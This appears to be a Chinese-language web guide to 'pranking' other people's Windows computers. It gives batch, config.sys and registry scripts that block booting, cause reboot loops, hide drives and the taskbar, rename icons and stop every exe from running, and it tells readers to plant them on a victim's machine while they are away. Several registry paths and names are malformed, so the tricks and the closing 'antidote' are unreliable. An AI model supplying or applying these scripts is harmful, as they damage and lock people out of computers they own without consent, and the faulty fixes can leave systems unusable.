一、DOS整蛊篇

1、黑招给了你黑色的屏幕

症状：受害者的电脑开机自检后便处于黑屏状态，只有左上角的光标闪烁。按键盘就回发出死机时才有的蜂 鸣声，无法进入系统。不明的人说不定会格式化磁盘，重装系统......想从容不迫地“干掉”对 方的电脑，就要在自己的电脑上做好准备。最好自己先试验一下，然后准备好解药。一切停当以后，就要把握对方不在电脑旁的机会......

做法：1）打开“记事本”程序或任意文本编辑器，录入以下内容：

@echo off

choice/c:&/n/S

2）将上述的内容保存为文件“winstart.bat”。

3）伺机将该文件拷贝至对方操作系统安装目录中，如果原文 件存在，覆盖即可。

解药：其实操作系统没有任何问题，只要你按住Shift键的同时，按下7(&)键，马上就可以进入系统了，进入系统后删除“winstart.bat”即可。

2、电脑不停重启

症状：受害者开机后，电脑就不断重启，始终不能进入操作系统。

做法：

1）点击“开始”按纽，选择“运行”，在对话框中输入“command”并回车打开DOS窗口，然后输入：

cd\\（回车，退到C盘根目录下）

copy con null.sys（回车，开始编写“null.sys”文件）

（直接再次按回车）

^z（按F6键或Ctrl+z键，屏幕上出现“^z”标志，回车以存盘。

2）打开“记事本”程序，录入以下内容：

Device=c:\

ull.sys/d:null

3）将上述内容存为文件“config.sys”。将“null.sys”和“config.sys”文件拷贝到对方的系统分 区根目录下。如果对方电脑中已存在“config.sys”文件，请将其改为任意其他名字。

解药：用启动软盘或光盘引导系统，然后删除那两个文件，在把原来的“config.sys”文件改回来就好了。

二、注册表整蛊篇（注册表整蛊方案，每一层都可以使用，也可以放在一起成为巨大的“连续计”，所以 在最后提供连续计的解药，如果想单独使用，只要把解药的各种成分分离就好了）

1、恐吓你一下

症状：windows启动是会跳出一个提示窗口，里面写满了危言耸听的话语。

做法：

1）打开“记事本”程序，录入以下内容：

Windows Registry Editor Version 5.00

[HKEY-LOCAL-MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Winlogon]

LegalNoticeCaption="Hello,You are foolish man"

LegalNoticeText="亲爱的朋友，你的系统已让我彻底摧毁......"

2）注意输入最后一行后要回车，保存文件为“zhenggu.reg”，文件名可以任意取，扩展名必须是“.reg”。

3）将该文件拷贝到对方电脑任意位置，

双击运行并确定，文件内容便被导入注册表，之后删除该文件。

4）上述方法只适用于Windows 2000/XP/Server2003，如果对方电脑用的是Windows98/Me操作系统，请将首行“Windows Registry Editor Version 5.00”改为“REGEDIT4”。

2、让磁盘分区统统消失

症状：对方进入系统桌面后，打开“我的电脑”却看不到磁盘分区。

做法：

1）单独使用此计就创建新文本，第一行仍然是“Windows Registry Editor Version 5.00”或 “REGEDIT4”。如果想形成连续计就打开上述“.reg”文件，继续编辑。先在上述内容后空一行，再输入：

[HKEY-CURRENT-USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer]

Nodriver=dword:fffffff

2）仍然保存为reg文件，使用方法同上。

3、让“开始”菜单和“任务栏”消失

症状：如标题所述。空一行后，接着在上述文本中输入：

NoSetTaskbar=dword:00000001

4、让桌面乱套

症状：桌面上的系统图标的名字都变成了莫名其妙的内容。

做法：

接着上一层内容继续输入以下内容（括号中的内容只是说明，不要输入）

[HKEY-LOCAL-MACHINE\\Software\\CLASSES\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}]

@="Hello,You are foolish man"（将“网上邻居”改为“Hello,You are foolish man”）

[HKEY-LOCAL-MACHINE\\Software\\CLASSES\\CLSID\\{5FF040-5081-101B-9F0800AA002F954E}]

@="臭烘烘的厕所"（将“回收站”改为“臭烘烘的厕所”）

[HKEY-LOCAL-MACHINE\\Software\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}]

@="xxx你真坏"（将“我的电脑”改为“xxx你真坏”）

[HKEY-LOCAL-MACHINE\\Software\\CLASSES\\CLSID\\{450D8FBA-AD25-11DO-98A8-0800361B1103}]

@="让你永远记住我"（将“我的文档”改为“让你永远记住我”）

5、禁用所有可执行文件

症状：电脑上的所有的exe文件都不能被执行。

做法：接着上一层内容继续输入：

[HKEY-CLASSES-ROOT\\exefile\\shell\\open\\command]

@="12345"

附解药：注入“REG”文件，文件如下：

Windows Registry Editor Version 5.00

[HKEY-LOCAL-MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Winlogon]

-“LegalNoticeCaption”=

-“LegalNoticeText”=

[HKEY-CURRENT-USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer]

Nodriver=

NoSetTaskbar=

[HKEY-LOCAL-MACHINE\\Software\\CLASSES\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}]

@=“网上邻居”

[HKEY-LOCAL-MACHINE\\Software\\CLASSES\\CLSID\\{5FF040-5081-101B-9F0800AA002F954E}]

@=“回收站”

[HKEY-LOCAL-MACHINE\\Software\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}]

@=“我的电脑”

[HKEY-LOCAL-MACHINE\\Software\\CLASSES\\CLSID\\{450D8FBA-

AD25-11DO-98A8-0800361B1103}]

@=“我的文档”

[HKEY-CLACCES-ROOT\\exefile\\shell\\open\\command]

@=""%1"%"

输入完毕后，保存为“unlock.reg”，此文件名可以随意。下载本文